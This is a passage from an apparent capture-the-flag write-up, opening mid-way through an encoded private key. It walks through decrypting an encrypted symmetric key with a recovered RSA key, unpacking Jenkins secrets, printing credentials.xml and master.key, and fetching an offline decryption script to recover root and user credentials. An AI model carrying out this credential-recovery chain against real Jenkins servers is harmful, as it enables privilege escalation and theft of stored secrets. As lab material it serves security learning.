vMTMrSQpsanJQR2hEUFlxdnQ4Y2VQVHhmMVh1NG1zUHZ1L0NJYmNlRzB0L2s3U3Y0cGNVbkJZRFUwVHdXbEpiT3Nqa0NLClp4T25VNjR0VXovZUVVWFo1VUI4dE1zeE9hN3VBa1dBelQzZExKSnlaNFFyRXp2em9NSWxtT3lOajRzc1M2RmMKQW5tSEJ1YS8rdE53QVNRQzRIbTJFa1VYCi0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0K

Again, let's compute for the md5sum for file integrity checking.

ashley@keym4ker:/keys$ md5sum key.bin.enc
// terminal output
md5sum key.bin.enc
64e9fff502052363ad2492ffef39c4cb  key.bin.enc

ashley@keym4ker:/keys$ md5sum private.pem
// terminal output
md5sum private.pem
93e55ba7ad6faa0c6f5f729b50ca2de8  private.pem

Decoding the key.bin.enc in our Kali terminal.

Decoding key

Decoding private.pem.

Decoding PEM

Public Key Cryptography

From the encryption.txt, we have an idea how the user perform the encryption using a combination of symmetric and asymmetric encryption.

ashley@keym4ker:/keys$ cat encryption.txt
// terminal output
cat encryption.txt
Hey team,

Here are some quick instructions on encrypting files using both symmetric and asymmetric encryption:

// Generating a private RSA key
openssl genrsa -out private.pem 2048

// Extracting the public RSA key
openssl rsa -in private.pem -outform PEM -pubout -out public.pem

// Create a symmetric key
openssl rand -hex 64 > key.bin

// Encrypt the file with the symmetric key
openssl enc -aes-256-cbc -pbkdf2 -iter 100000 -salt -in <file> -out <file>.enc -pass file:key.bin

Let me know if you have any questions!

Ashley Madison

Let's perform the decryption process

// First, let's decrypt the symmetric key with the private.pem file
└─$ openssl pkeyutl -decrypt -inkey private.pem -in key.bin.enc -out decrypted_key.bin
// Now, we have a symmetric key
└─$ cat decrypted_key.bin        
7626168018309ac8bdeeb24a7072613f02faa0ed16db94a9635ab92e2679f137deaec82a219d674cfaab68e006a55006d44b2a9d793bb5dda627f165d9806047
// Then, let's use this key to try to decrypt the encrypted jenkins_secret.tar.gz.enc
openssl enc -d -aes-256-cbc -pbkdf2 -iter 100000 -in jenkins_secret.tar.gz.enc -out jenkins_secret.tar.gz -pass file:decrypted_key.bin

Privilege Escalation to root

Then, let's unzipped the file in our terminal

Jenkins Secret

└─$ cat credentials.xml          
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@2.3.15">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey plugin="ssh-credentials@1.18.1">
          <scope>GLOBAL</scope>
          <id>584a41dd-0e83-419b-93fe-315c2d7f30c0</id>
          <description></description>
          <username>root</username>
          <passphrase>{AQAAABAAAAAgR6wt0qEWLkj4lB6mCDiPaXZh3ZXcYAwcUR71kk4mnJ2zzJGlDl3vr0SSdVe23e1H}</passphrase>
          <privateKeySource class="com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey$DirectEntryPrivateKeySource">
            <privateKey>{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}</privateKey>
          </privateKeySource>
        </com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
        <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          <scope>GLOBAL</scope>
          <id>14f59246-75f6-4a94-921e-4fb9f212ddbe</id>
          <description>Slave node credentials</description>
          <username>trisha</username>
          <password>{AQAAABAAAAAQ9l9lP5ifdP4aZM7+ArwT1dgW0S4mzGV9ikuDXV2VSc4=}</password>
        </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

We see that there are two stored secrets.

  • root user SSH Private key that is protected with a passphrase
  • user trisha

Since the files secrets/master.key, secrets/hudson.util.Secret, and credentials.xml were obtained, we could perform an offline decryption of the stored passphrases for the users root and trisha.

└─$ cat secret/master.key 
8d39248eed1956622f16f8fe9699832a05f59f7ea38fa2e161fd9483ebfaad1ab757385ec17fd93fb8d1855d4e18e0d0515d6cd3bf575b632ee43a28ccb15ab5ee186e000789ca02a1e56bc337dc2fb98e79fcaff6b8c07958ed279f491eed24a3e9123825cad57f60f3929f3b3d60490f35c0b8f513f59647c2de1f568133ba

We can use the script from this repo to decrypt the secrets. Let's download and run the script, providing the three files as arguments.

// Download the offline decryptor
wget https://raw.githubusercontent.com/gquere/pwn_jenkins/refs/heads/master/offline_decryption/jenkins_offline_decrypt.py

// Run the script
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret credentials.xml